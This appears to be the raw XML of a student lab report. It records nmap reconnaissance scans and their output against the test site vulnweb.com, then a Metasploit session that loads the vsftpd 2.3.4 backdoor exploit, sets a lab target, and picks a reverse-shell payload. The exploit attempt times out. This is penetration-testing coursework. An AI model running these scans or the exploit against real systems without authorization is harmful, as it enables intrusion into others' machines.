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D64C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="360" w:firstLineChars="150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0000030C">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="360" w:firstLineChars="15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COMMANDS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000030D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000003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nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000030F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 perform simple ping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nmap -sn vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000310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 perform SYN scan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nmap -sS vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000311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 identify the service and version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nmap -sV vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000312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 scan a specific port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nmap -p 80 --script http-headers vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031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 list host in network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nmap -sL vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031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 perform UDP scan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nmap -sU vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031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 identify the OS in network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nmap -O vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031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 perform aggressive scan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nmap -A vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031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 save output as file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nmap -oN outputfile.nmap vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031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Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031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For portscan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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031A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use auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031B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set RHOSTS vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031D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for version scanning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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031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use auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000031F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set RHOSTS vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000320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set ports 21,22,80,443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032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set version true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032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Run Nmap with version detection and save results in Metasploit DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032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NEW TERMINAL: sudo systemctl start postgresql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psql --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032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sudo pg_ctlcluster &lt;VERSION&gt; main start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032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msf6 &gt; msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032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msf6 &gt; db_nmap -sV vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032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Search Metasploit modules related to vsftpd (Very Secure File Transfer Protocol Daemon)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msf6 &gt; search vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032A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Load exploit for vsftpd 2.3.4 backdoor vulnerability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msf6 &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032B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2127" w:right="0" w:hanging="284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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032C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2127" w:right="0" w:hanging="284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set RHOSTS 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032D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2127" w:right="0" w:hanging="284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show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000032E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2127" w:right="0" w:hanging="284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set payload cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000330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2127" w:right="0" w:hanging="284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set LHOST 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000331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3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OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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└─$ nmap -sn vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 01:27 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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scan report for vulnweb.com (44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Host is up (0.0020s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Other addresses for vulnweb.com (not scanned): 64:ff9b::2ce4:f903</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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done: 1 IP address (1 host up) scanned in 8.22 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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3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kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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└─$ nmap -sS vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 01:27 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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scan report for vulnweb.com (44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Host is up (0.019s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Other addresses for vulnweb.com (not scanned): 64:ff9b::2ce4:f903</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Not shown: 999 filtered tcp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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80/tcp open  http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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done: 1 IP address (1 host up) scanned in 16.31 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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└─$ nmap -sV vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 01:28 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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scan report for vulnweb.com (44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Host is up (0.0011s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Other addresses for vulnweb.com (not scanned): 64:ff9b::2ce4:f903</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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All 1000 scanned ports on vulnweb.com (44.228.249.3) are in ignored states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Not shown: 1000 filtered tcp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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3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Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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done: 1 IP address (1 host up) scanned in 4.57 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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└─$ nmap -p 80 --script http-headers vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 01:29 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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scan report for vulnweb.com (44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Host is up (0.0015s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Other addresses for vulnweb.com (not scanned): 64:ff9b::2ce4:f903                                                                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com                                                                                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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0003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PORT   STATE    SERVICE                                                                                                                                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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80/tcp filtered http                                                                                                                                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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0003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Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds                                                                                                                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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0003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kali)-[~]                                                                                                                                                                                                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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└─$ nmap -sL vulnweb.com                                                                                                                                                                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 01:29 EDT                                                                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Nmap scan report for vulnweb.com (44.228.249.3)                                                                                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Other addresses for vulnweb.com (not scanned): 64:ff9b::2ce4:f903</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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done: 1 IP address (0 hosts up) scanned in 0.03 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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3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kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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└─$ nmap -sU vulnweb.com                                                                                                                                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 01:29 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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scan report for vulnweb.com (44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Host is up (0.0012s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Other addresses for vulnweb.com (not scanned): 64:ff9b::2ce4:f903</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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All 1000 scanned ports on vulnweb.com (44.228.249.3) are in ignored states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Not shown: 1000 open|filtered udp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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done: 1 IP address (1 host up) scanned in 4.48 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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└─$ nmap -O vulnweb.com                                                                                                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 01:29 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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scan report for vulnweb.com (44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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Host is up (0.0070s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Other addresses for vulnweb.com (not scanned): 64:ff9b::2ce4:f903</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Not shown: 999 filtered tcp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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80/tcp open  http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Device type: phone|switch|VoIP adapter|bridge|general purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Running (JUST GUESSING): Nokia Symbian OS (90%), Cisco embedded (87%), Oracle Virtualbox (85%), Slirp (85%), QEMU (85%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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OS CPE: cpe:/o:nokia:symbian_os cpe:/h:cisco:catalyst_1900 cpe:/h:cisco:ata_188_voip_gateway cpe:/o:oracle:virtualbox cpe:/a:danny_gasparovski:slirp cpe:/a:qemu:qemu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Aggressive OS guesses: Nokia 3600i mobile phone (90%), Cisco Catalyst 1900 switch (87%), Cisco ATA 188 VoIP adapter (85%), Oracle Virtualbox Slirp NAT bridge (85%), QEMU user mode network gateway (85%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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No exact OS matches for host (test conditions non-ideal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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done: 1 IP address (1 host up) scanned in 13.50 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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└─$ nmap -A vulnweb.com                                                                                                                                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 01:30 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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scan report for vulnweb.com (44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109023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14:paraId="000003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Host is up (0.0058s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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Other addresses for vulnweb.com (not scanned): 64:ff9b::2ce4:f903</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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All 1000 scanned ports on vulnweb.com (44.228.249.3) are in ignored states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Not shown: 1000 filtered tcp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Aggressive OS guesses: 3Com 4500G switch (92%), H3C Comware 5.20 (92%), Huawei VRP 8.100 (92%), Microsoft Windows Server 2003 SP1 (92%), Oracle Virtualbox Slirp NAT bridge (92%), QEMU user mode network gateway (92%), AXIS 2100 Network Camera (92%), D-Link DP-300U, DP-G310, or Hamlet HPS01UU print server (92%), HP Tru64 UNIX 5.1A (92%), Sanyo PLC-XU88 digital video projector (92%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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No exact OS matches for host (test conditions non-ideal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Network Distance: 1 hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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TRACEROUTE (using port 80/tcp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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HOP RTT     ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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1   3.94 ms ec2-44-228-249-3.us-west-2.compute.amazonaws.com (44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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done: 1 IP address (1 host up) scanned in 12.80 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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└─$ nmap -oN outputfile.nmap vulnweb.com                                                                                                                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 01:30 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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scan report for vulnweb.com (44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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Host is up (0.0028s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Other addresses for vulnweb.com (not scanned): 64:ff9b::2ce4:f903</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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All 1000 scanned ports on vulnweb.com (44.228.249.3) are in ignored states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Not shown: 1000 filtered tcp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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done: 1 IP address (1 host up) scanned in 4.30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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METASPLOIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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msf6 use auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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msf6 auxiliary(scanner/portscan/tcp) &gt; set RHOSTS vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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RHOSTS =&gt; vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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msf6 use auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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msf6 auxiliary(scanner/portscan/tcp) &gt; set RHOSTS vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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RHOSTS =&gt; vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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msf6 auxiliary(scanner/portscan/tcp) set ports 21,22,80,443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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ports =&gt; 21,22,80,443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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msf6 auxiliary(scanner/portscan/tcp) &gt; set version true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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version =&gt; true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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msf6 auxiliary(scanner/portscan/tcp) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[+] 44.228.249.3          - 44.228.249.3:80 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Scanned 1 of 2 hosts (50% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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[+] [64:ff9b::2ce4:f903]  - 64:ff9b::2ce4:f903:80 - TCP OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Scanned 1 of 2 hosts (50% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E5C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14:paraId="000003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[*] Scanned 2 of 2 hosts (100% complete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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[*] Auxiliary module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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3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msf6 &gt; msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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msf6 &gt; db_nmap -sV vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Nmap: Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 02:03 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Nmap: Nmap scan report for vulnweb.com (44.228.249.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Nmap: Host is up (0.020s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Nmap: Other addresses for vulnweb.com (not scanned): 64:ff9b::2ce4:f903</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Nmap: rDNS record for 44.228.249.3: ec2-44-228-249-3.us-west-2.compute.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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[*] Nmap: Not shown: 999 filtered tcp ports (no-response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Nmap: PORT   STATE SERVICE    VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Nmap: 80/tcp open  tcpwrapped</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 28.81 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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msf6 &gt; search vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Matching Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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#  Name                                  Disclosure Date  Rank       Check  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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-  ----                                  ---------------  ----       -----  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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0  auxiliary/dos/ftp/vsftpd_232          2011-02-03       normal     Yes    VSFTPD 2.3.2 Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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[*] Using configured payload cmd/unix/interact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Module options (exploit/unix/ftp/vsftpd_234_backdoor):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Name    Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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----    ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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RPORT   21               yes       The target port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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--  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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0   Automatic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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View the full module info with the info, or info -d command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; set RHOSTS 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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RHOSTS =&gt; 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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Compatible Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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===================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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#  Name                       Disclosure Date  Rank    Check  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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-  ----                       ---------------  ----    -----  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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0  payload/cmd/unix/interact  .                normal  No     Unix Command, Interact with Established Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051BEC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14:paraId="000003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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; set payload cmd/unix/interact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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payload =&gt; cmd/unix/interact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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msf6 exploit(unix/ftp/vsftpd_234_backdoor) set LHOST 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[!] Unknown datastore option: LHOST. Did you mean RHOST?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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LHOST =&gt; 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000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msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[-] 192.168.56.102:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.56.102:21) timed out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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[*] Exploit completed, but no session was created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000003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18DF2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Noto Sans Symbols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DCBA6B53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCBA6B53"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="└"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440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70EC97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2470EC97"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="└"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160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920" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:cs="Noto Sans Symbol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E5784D"/>
    <w:rsid w:val="55E5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Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-I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2026-07-21T16:25:00Z</dcterms:created>
  <dc:creator>Merlin</dc:creator>
  <cp:lastModifiedBy>Merlin</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-21T16:29:38Z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01E4C2B0F95B44FBA4D0575D52987CD5_11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